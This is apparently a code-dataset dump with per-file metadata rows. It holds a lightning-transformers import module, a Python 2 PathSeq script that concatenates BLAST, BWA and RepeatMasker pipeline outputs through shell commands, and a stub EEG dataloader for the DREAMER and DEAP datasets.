| 3,197.62069 | 46,018 | 0.995924 | 40 | 92,731 | 2,308.75 | 0.825 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.686779 | 0.003073 | 92,731 | 28 | 46,019 | 3,311.821429 | 0.312182 | 0 | 0 | 0.074074 | 0 | 0 | 0.994975 | 0.993562 | 0 | 1 | 0.993562 | 0 | 0 | 1 | 0 | false | 0 | 0.037037 | 0 | 0.037037 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
06ffacf0b90b7ce27bf22e4bf5f4c02d3ce689b6 | 234 | py | Python | lightning_transformers/task/nlp/multiple_choice/datasets/__init__.py | maksym-taranukhin/lightning-transformers | aa7202657973b5b65c3c36eb745621043859ebc4 | [
"Apache-2.0"
] | 451 | 2021-04-21T15:53:59.000Z | 2022-03-29T10:39:45.000Z | lightning_transformers/task/nlp/multiple_choice/datasets/__init__.py | mathemusician/lightning-transformers | b2ef06113433e6a178ce4d3c9df7ede8064e247f | [
"Apache-2.0"
] | 92 | 2021-04-21T18:42:58.000Z | 2022-03-30T05:29:54.000Z | lightning_transformers/task/nlp/multiple_choice/datasets/__init__.py | mathemusician/lightning-transformers | b2ef06113433e6a178ce4d3c9df7ede8064e247f | [
"Apache-2.0"
] | 51 | 2021-04-22T05:35:28.000Z | 2022-03-17T13:08:12.000Z | from lightning_transformers.task.nlp.multiple_choice.datasets.race import RaceMultipleChoiceDataModule # noqa: F401
from lightning_transformers.task.nlp.multiple_choice.datasets.swag import SwagMultipleChoiceDataModule # noqa: F401
| 78 | 116 | 0.871795 | 26 | 234 | 7.692308 | 0.576923 | 0.13 | 0.25 | 0.29 | 0.54 | 0.54 | 0.54 | 0.54 | 0 | 0 | 0 | 0.027523 | 0.068376 | 234 | 2 | 117 | 117 | 0.889908 | 0.089744 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
6630183781174b0f9157fef249a22516ceaf5e95 | 26,787 | py | Python | concat_files_standalone.py | ChandraPedamallu/PathSeq | 2d92791713a7350ad6eb0540bf9cddad46b50049 | [
"MIT"
] | 9 | 2018-02-04T23:45:14.000Z | 2021-05-13T05:30:58.000Z | concat_files_standalone.py | ChandraPedamallu/PathSeq | 2d92791713a7350ad6eb0540bf9cddad46b50049 | [
"MIT"
] | 5 | 2017-07-10T12:56:19.000Z | 2018-11-13T19:52:29.000Z | concat_files_standalone.py | ChandraPedamallu/PathSeq | 2d92791713a7350ad6eb0540bf9cddad46b50049 | [
"MIT"
] | 2 | 2017-10-16T21:30:08.000Z | 2019-12-30T11:02:22.000Z | #!/usr/bin/env python
# Created: Chandra Sekhar Pedamallu, DFCI, The Broad Institute
# Email : pcs.murali@gmail.com
# Purpose: PathSeq V2.0 pipeline
# Updates: Concatenate output files Standalone
# DFCI / Broad Institute@ copyright
import sys
import os
import commands
import random
import time
start_time = time.time()
print "CONCATENATE\n"
#Arguments
args=sys.argv
print "Step 0: Read config, premegablast, megablast, and blastn config files"
# Strip off spaces infornt and behing the lines and get file name
namefile = args[1].strip() # Read in FQ1 format
configfile = args[2].strip()
pdir=args[3].strip()
cdir=args[4].strip()
id_step=args[5].strip()
namefile_o=args[6].strip()
mergesamjar=args[7].strip()
javaloc=args[8].strip()
tmpdir=args[9].strip()
Samtools=args[10].strip()
mkdir_file = "mkdir " +cdir
mkdir_file = mkdir_file + "/"
mkdir_file = mkdir_file + "combine_results"
print mkdir_file
mkdir_file_cmd=commands.getstatusoutput(mkdir_file)
print mkdir_file_cmd
ff = open(configfile, 'r')
database = ff.readlines()
ff.close()
dbindex=0
# Write the respective database file into config files and upload them
for no_databases1 in database:
dbindex = dbindex + 1
line = no_databases1.strip()
data_split=line.split(":")
print data_split
if data_split[0] == "BWA":
print "BWA Concate";
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"*.bwa."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +".stat >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/BWA."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +".stat"
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"*"
concate_files = concate_files +".unmappedbwa.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
concate_files = concate_files +"BWA"
concate_files = concate_files +".unmappedbwa.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
# List all Samfiles in the directory into a file
lst_samfiles = "ls " + cdir
lst_samfiles = lst_samfiles +"/"
lst_samfiles = lst_samfiles +"*"
lst_samfiles = lst_samfiles +"."
lst_samfiles = lst_samfiles +str(id_step)
lst_samfiles = lst_samfiles +"_"
lst_samfiles = lst_samfiles +str(dbindex)
lst_samfiles = lst_samfiles +".aln.sam | xargs -n 1 > "
lst_samfiles = lst_samfiles + cdir
lst_samfiles = lst_samfiles +"/"
lst_samfiles = lst_samfiles +"combine_results/"
lst_samfiles = lst_samfiles +"lstSamfiles."
lst_samfiles = lst_samfiles +str(id_step)
lst_samfiles = lst_samfiles +"_"
lst_samfiles = lst_samfiles +str(dbindex)
print "**************************"
print lst_samfiles
print "**************************"
lst_samfiles_cmd=commands.getstatusoutput(lst_samfiles)
print lst_samfiles_cmd
# File name with list of samfiles
lst_sam_filename=cdir + "/"
lst_sam_filename=lst_sam_filename+"combine_results/"
lst_sam_filename=lst_sam_filename+"lstSamfiles."
lst_sam_filename=lst_sam_filename+str(id_step)
lst_sam_filename=lst_sam_filename+"_"
lst_sam_filename=lst_sam_filename+str(dbindex)
print lst_sam_filename
# Read the File with list of samfiles
flst_samfiles = open(lst_sam_filename, 'r')
samfile_list = flst_samfiles.readlines()
print samfile_list
# Merge the sam files
mergesam_cmd= Samtools + " merge "
mergesam_cmd= mergesam_cmd + cdir
mergesam_cmd= mergesam_cmd + "/combine_results/"
mergesam_cmd= mergesam_cmd + "BWAalignedsamfile."
mergesam_cmd= mergesam_cmd + str(id_step)
mergesam_cmd= mergesam_cmd + "_"
mergesam_cmd= mergesam_cmd + str(dbindex)
mergesam_cmd= mergesam_cmd + ".sam"
for samfile_list1 in samfile_list:
line_samfilelst = samfile_list1.strip()
mergesam_cmd=mergesam_cmd+" "
mergesam_cmd=mergesam_cmd+line_samfilelst
#mergesam_cmd= javaloc + " -jar "
#mergesam_cmd= mergesam_cmd + mergesamjar
#mergesam_cmd= mergesam_cmd + " TMP_DIR="
#mergesam_cmd= mergesam_cmd + tmpdir
#mergesam_cmd= mergesam_cmd + " VALIDATION_STRINGENCY=SILENT OUTPUT="
#mergesam_cmd= mergesam_cmd + cdir
#mergesam_cmd= mergesam_cmd + "/combine_results/"
#mergesam_cmd= mergesam_cmd + "BWAalignedsamfile."
#mergesam_cmd= mergesam_cmd + str(id_step)
#mergesam_cmd= mergesam_cmd + "_"
#mergesam_cmd= mergesam_cmd + str(dbindex)
#mergesam_cmd= mergesam_cmd + ".sam"
#for samfile_list1 in samfile_list:
# line_samfilelst = samfile_list1.strip()
# mergesam_cmd=mergesam_cmd+" INPUT="
# mergesam_cmd=mergesam_cmd+line_samfilelst
ff.close()
mergesam_run=commands.getstatusoutput(mergesam_cmd)
print mergesam_run
elif data_split[0] == "MEGABLAST":
print "MEGABLAST Concate";
filename=cdir + "/"
filename=filename + "combine_results/"
filename=filename +"Megablast"
filename=filename +".mega.annotate.hittable."
filename=filename +str(id_step)
filename=filename +"_"
filename=filename +str(dbindex)
finaloutname=open(filename,'w')
finaloutname.write("Read_Name\tRead_Length\tHit_numb\tSubject_id\tMapped_Subject\tSubject_Acession_Number\tSubject_Length\tBit_score\tE-value\tHSP_hit_starts\tHSP_hit_ends\tHSP_Identity\tHSP_alignlength\tPercentage_identity\tQuery_coverage\tHSP_start\tHSP_end\tAlignedSeq\tFullQuery\tKingdom\tSubjectName\n")
finaloutname.close()
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".mega.annotate.hittable."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >> "
concate_files = concate_files +filename
#concate_files = concate_files + cdir
#concate_files = concate_files +"/"
#concate_files = concate_files +"combine_results/"
#concate_files = concate_files +"Megablast"
#concate_files = concate_files +".annotate.hittable."
#concate_files = concate_files +str(id_step)
#concate_files = concate_files +"_"
#concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".unmappedmega.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files + "Megablast"
concate_files = concate_files +".unmappedmega.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".mappedmega.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"Megablast"
concate_files = concate_files +".mappedmega.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
elif data_split[0] == "BLASTN":
print "BLASTN Concate";
filename=cdir + "/"
filename=filename + "combine_results/"
filename=filename +"Blastn"
filename=filename +".blastn.annotate.hittable."
filename=filename +str(id_step)
filename=filename +"_"
filename=filename +str(dbindex)
finaloutname=open(filename,'w')
finaloutname.write("Read_Name\tRead_Length\tHit_numb\tSubject_id\tMapped_Subject\tSubject_Acession_Number\tSubject_Length\tBit_score\tE-value\tHSP_hit_starts\tHSP_hit_ends\tHSP_Identity\tHSP_alignlength\tPercentage_identity\tQuery_coverage\tHSP_start\tHSP_end\tAlignedSeq\tFullQuery\tKingdom\tSubjectName\n")
finaloutname.close()
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".blastn.annotate.hittable."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >> "
concate_files = concate_files +filename
#concate_files = concate_files + cdir
#concate_files = concate_files +"/"
#concate_files = concate_files +"combine_results/"
#concate_files = concate_files +"Blastn"
#concate_files = concate_files +".blastn.annotate.hittable."
#concate_files = concate_files +str(id_step)
#concate_files = concate_files +"_"
#concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".unmappedblastn.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"Blastn"
concate_files = concate_files +".unmappedblastn.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".mappedblastn.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"Blastn"
concate_files = concate_files +".mappedblastn.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
elif data_split[0] == "REPEATMASKER":
print "REPEATMASKER CONCATE";
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".afterrep.fq1"
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"RepeatMasker"
concate_files = concate_files +".afterrep.fq1"
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
elif data_split[0] == "PREMEGABLAST":
print "PREMEGABLAST Concate";
filename=cdir + "/"
filename=filename + "combine_results/"
filename=filename +"Premegablast"
filename=filename +".premega.annotate.hittable."
filename=filename +str(id_step)
filename=filename +"_"
filename=filename +str(dbindex)
finaloutname=open(filename,'w')
finaloutname.write("Read_Name\tRead_Length\tHit_numb\tSubject_id\tMapped_Subject\tSubject_Acession_Number\tSubject_Length\tBit_score\tE-value\tHSP_hit_starts\tHSP_hit_ends\tHSP_Identity\tHSP_alignlength\tPercentage_identity\tQuery_coverage\tHSP_start\tHSP_end\tAlignedSeq\tFullQuery\tKingdom\tSubjectName\n")
finaloutname.close()
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".premega.annotate.hittable."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >> "
concate_files = concate_files +filename
#concate_files = concate_files + cdir
#concate_files = concate_files +"/"
#concate_files = concate_files +"combine_results/"
#concate_files = concate_files +"Premegablast"
#concate_files = concate_files +".premega.annotate.hittable."
#concate_files = concate_files +str(id_step)
#concate_files = concate_files +"_"
#concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".unmappedpremega.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"Premegablast"
concate_files = concate_files +".unmappedpremega.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".mappedpremega.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"Premegablast"
concate_files = concate_files +".mappedpremega.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
elif data_split[0] == "BLASTX":
print "BLASTX Concate"
filename=cdir + "/"
filename=filename + "combine_results/"
filename=filename +"Blastx"
filename=filename +".blastx.annotate.hittable."
filename=filename +str(id_step)
filename=filename +"_"
filename=filename +str(dbindex)
finaloutname=open(filename,'w')
finaloutname.write("Read_Name\tRead_Length\tHit_numb\tSubject_id\tMapped_Subject\tSubject_Acession_Number\tSubject_Length\tBit_score\tE-value\tHSP_hit_starts\tHSP_hit_ends\tHSP_Identity\tHSP_alignlength\tPercentage_identity\tQuery_coverage\tHSP_start\tHSP_end\tAlignedSeq\tFullQuery\tKingdom\tSubjectName\n")
finaloutname.close()
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".blastx.annotate.hittable."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >>"
concate_files = concate_files +filename
#concate_files = concate_files + cdir
#concate_files = concate_files +"/"
#concate_files = concate_files +"combine_results/"
#concate_files = concate_files +"Blastx"
#concate_files = concate_files +".blastx.annotate.hittable."
#concate_files = concate_files +str(id_step)
#concate_files = concate_files +"_"
#concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".unmappedblastx.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"Blastx"
concate_files = concate_files +".unmappedblastx.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".mappedblastx.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
concate_files = concate_files +"Blastx"
#concate_files = concate_files +namefile
concate_files = concate_files +".mappedblastx.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
elif data_split[0] == "TBLASTX":
print "TBLASTX Concate"
filename=cdir + "/"
filename=filename + "combine_results/"
filename=filename +"TBlastx"
filename=filename +".tblastx.annotate.hittable."
filename=filename +str(id_step)
filename=filename +"_"
filename=filename +str(dbindex)
finaloutname=open(filename,'w')
finaloutname.write("Read_Name\tRead_Length\tHit_numb\tSubject_id\tMapped_Subject\tSubject_Acession_Number\tSubject_Length\tBit_score\tE-value\tHSP_hit_starts\tHSP_hit_ends\tHSP_Identity\tHSP_alignlength\tPercentage_identity\tQuery_coverage\tHSP_start\tHSP_end\tAlignedSeq\tFullQuery\tKingdom\tSubjectName\n")
finaloutname.close()
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".tblastx.annotate.hittable."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >>"
concate_files = concate_files +filename
#concate_files = concate_files + cdir
#concate_files = concate_files +"/"
#concate_files = concate_files +"combine_results/"
#concate_files = concate_files +"TBlastx"
#concate_files = concate_files +".tblastx.annotate.hittable."
#concate_files = concate_files +str(id_step)
#concate_files = concate_files +"_"
#concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".unmappedtblastx.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"TBlastx"
concate_files = concate_files +".unmappedtblastx.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".mappedtblastx.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
concate_files = concate_files +"TBlastx"
#concate_files = concate_files +namefile
concate_files = concate_files +".mappedtblastx.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
elif data_split[0] == "TBLASTN":
print "TBLASTN Concate"
filename=cdir + "/"
filename=filename + "combine_results/"
filename=filename +"TBlastn"
filename=filename +".tblastn.annotate.hittable."
filename=filename +str(id_step)
filename=filename +"_"
filename=filename +str(dbindex)
finaloutname=open(filename,'w')
finaloutname.write("Read_Name\tRead_Length\tHit_numb\tSubject_id\tMapped_Subject\tSubject_Acession_Number\tSubject_Length\tBit_score\tE-value\tHSP_hit_starts\tHSP_hit_ends\tHSP_Identity\tHSP_alignlength\tPercentage_identity\tQuery_coverage\tHSP_start\tHSP_end\tAlignedSeq\tFullQuery\tKingdom\tSubjectName\n")
finaloutname.close()
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".tblastn.annotate.hittable."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >>"
concate_files = concate_files +filename
#concate_files = concate_files + cdir
#concate_files = concate_files +"/"
#concate_files = concate_files +"combine_results/"
#concate_files = concate_files +"TBlastn"
#concate_files = concate_files +".tblastn.annotate.hittable."
#concate_files = concate_files +str(id_step)
#concate_files = concate_files +"_"
#concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".unmappedtblastn.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
#concate_files = concate_files +namefile
concate_files = concate_files +"TBlastn"
concate_files = concate_files +".unmappedtblastn.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concate_files = "cat " + cdir
concate_files = concate_files +"/"
concate_files = concate_files +namefile
concate_files = concate_files +".mappedtblastn.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
concate_files = concate_files +" >"
concate_files = concate_files + cdir
concate_files = concate_files +"/"
concate_files = concate_files +"combine_results/"
concate_files = concate_files +"TBlastn"
#concate_files = concate_files +namefile
concate_files = concate_files +".mappedtblastn.fq1."
concate_files = concate_files +str(id_step)
concate_files = concate_files +"_"
concate_files = concate_files +str(dbindex)
print concate_files
concate_files_cmd=commands.getstatusoutput(concate_files)
print concate_files_cmd
concatloc = "cat " + cdir
concatloc = concatloc +"/"
concatloc = concatloc +namefile
concatloc = concatloc +".unmapped*.fq1."
concatloc = concatloc +str(id_step)
concatloc = concatloc +"_"
concatloc = concatloc +str(dbindex-1)
concatloc = concatloc +" >"
concatloc = concatloc + cdir
concatloc = concatloc +"/"
concatloc = concatloc +"combine_results/"
concatloc = concatloc +namefile
concatloc = concatloc +".unmappedfinal.fq1"
print concatloc
concatloc_cmd=commands.getstatusoutput(concatloc)
print concatloc_cmd
end_time = time.time()
timetaken= (end_time - start_time)
print "Time Taken:"
print timetaken
| 40.100299 | 311 | 0.745175 | 3,212 | 26,787 | 5.83873 | 0.060399 | 0.484377 | 0.455903 | 0.575877 | 0.879386 | 0.871387 | 0.858164 | 0.856351 | 0.855178 | 0.825744 | 0 | 0.002786 | 0.155673 | 26,787 | 667 | 312 | 40.16042 | 0.826414 | 0.138873 | 0 | 0.763359 | 0 | 0.01145 | 0.172262 | 0.098974 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.009542 | null | null | 0.125954 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
664cdb380bf51b910dc2a1f0a629042add3b4aa2 | 3,107 | py | Python | emotion-classification/src/data/load_public_datasets.py | hnguyen25/affective-reality | 7aa6be118c2850ba201271e55f16065a83de897a | [
"CECILL-B"
] | null | null | null | emotion-classification/src/data/load_public_datasets.py | hnguyen25/affective-reality | 7aa6be118c2850ba201271e55f16065a83de897a | [
"CECILL-B"
] | null | null | null | emotion-classification/src/data/load_public_datasets.py | hnguyen25/affective-reality | 7aa6be118c2850ba201271e55f16065a83de897a | [
"CECILL-B"
] | null | null | null | """
LOAD_PUBLIC_DATASETS
Huy Nguyen (2021)
Used to load cleaned EEG data from publicly available datasets, such as the DEAP and DREAMER datasets, into a common data format.
"""
class DreamerDataloader:
"""Used to load data obtained from the DREAMER public dataset.
Example:
Attributes:
"""
def load_raw_data(self, filepath : str):
"""
Args:
filepath (str): path to DREAMER file (must be in .mat format)
Returns:
numpy.array: raw data file loaded into python
"""
return None
def get_dataset_info(self, filepath : str):
"""
Args:
filepath (str): path to DREAMER file (must be in .mat format)
Returns:
dict: dictionary with important info about dataset
"""
return None
def load_data(self, filepath : str, num_subjects=-1, num_trials=-1, choose_randomly=False):
"""
Args:
filepath (str): path to DREAMER file (must be in .mat format)
num_subjects (int): if not -1, choose the number of participants from the dataset to pull data from; cannot exceed total number of participants as specified in get_dataset_info()
num_trials (int): if not -1, choose the number of trials for each participant to pull data from; cannot exceed total number of trials done in experiments as specified in get_dataset_info()
choose_randomly (bool): if num_subjects is not -1, then randomly choose subjects whose data will be loaded.
Returns:
numpy.array: loaded data in a shared data format
"""
return None
class DEAPDataloader:
"""Used to load data obtained from the DEAP public dataset.
Example:
Attributes:
"""
def load_raw_data(self, filepath : str):
"""
Args:
filepath (str): path to DREAMER file (must be in .mat format)
Returns:
numpy.array: raw data file loaded into python
"""
return None
def get_dataset_info(self, filepath : str):
"""
Args:
filepath (str): path to DREAMER file (must be in .mat format)
Returns:
dict: dictionary with important info about dataset
"""
return None
def load_data(self, filepath : str, num_subjects=-1, num_trials=-1, choose_randomly=False):
"""
Args:
filepath (str): path to DREAMER file (must be in .mat format)
num_subjects (int): if not -1, choose the number of participants from the dataset to pull data from; cannot exceed total number of participants as specified in get_dataset_info()
num_trials (int): if not -1, choose the number of trials for each participant to pull data from; cannot exceed total number of trials done in experiments as specified in get_dataset_info()
choose_randomly (bool): if num_subjects is not -1, then randomly choose subjects whose data will be loaded.
Returns:
numpy.array: loaded data in a shared data format
"""
return None | 35.306818 | 200 | 0.635983 | 414 | 3,107 | 4.690821 | 0.207729 | 0.067971 | 0.046344 | 0.058702 | 0.903193 | 0.903193 | 0.903193 | 0.873326 | 0.873326 | 0.873326 | 0 | 0.00639 | 0.294818 | 3,107 | 88 | 201 | 35.306818 | 0.879963 | 0.680399 | 0 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
b07d2a0e14ca02cced4978ef380070afedac256d | 178 | py | Python | trashtalk/settings/__init__.py | hcote/TrashTalk | eb60cff7451f8d26bf141123d6a3580167583827 | [
"MIT"
] | 8 | 2017-10-04T02:29:13.000Z | 2019-10-09T03:38:35.000Z | trashtalk/settings/__init__.py | hcote/TrashTalk | eb60cff7451f8d26bf141123d6a3580167583827 | [
"MIT"
] | 108 | 2017-09-15T23:13:12.000Z | 2018-05-21T18:26:15.000Z | trashtalk/settings/__init__.py | hcote/TrashTalk | eb60cff7451f8d26bf141123d6a3580167583827 | [
"MIT"
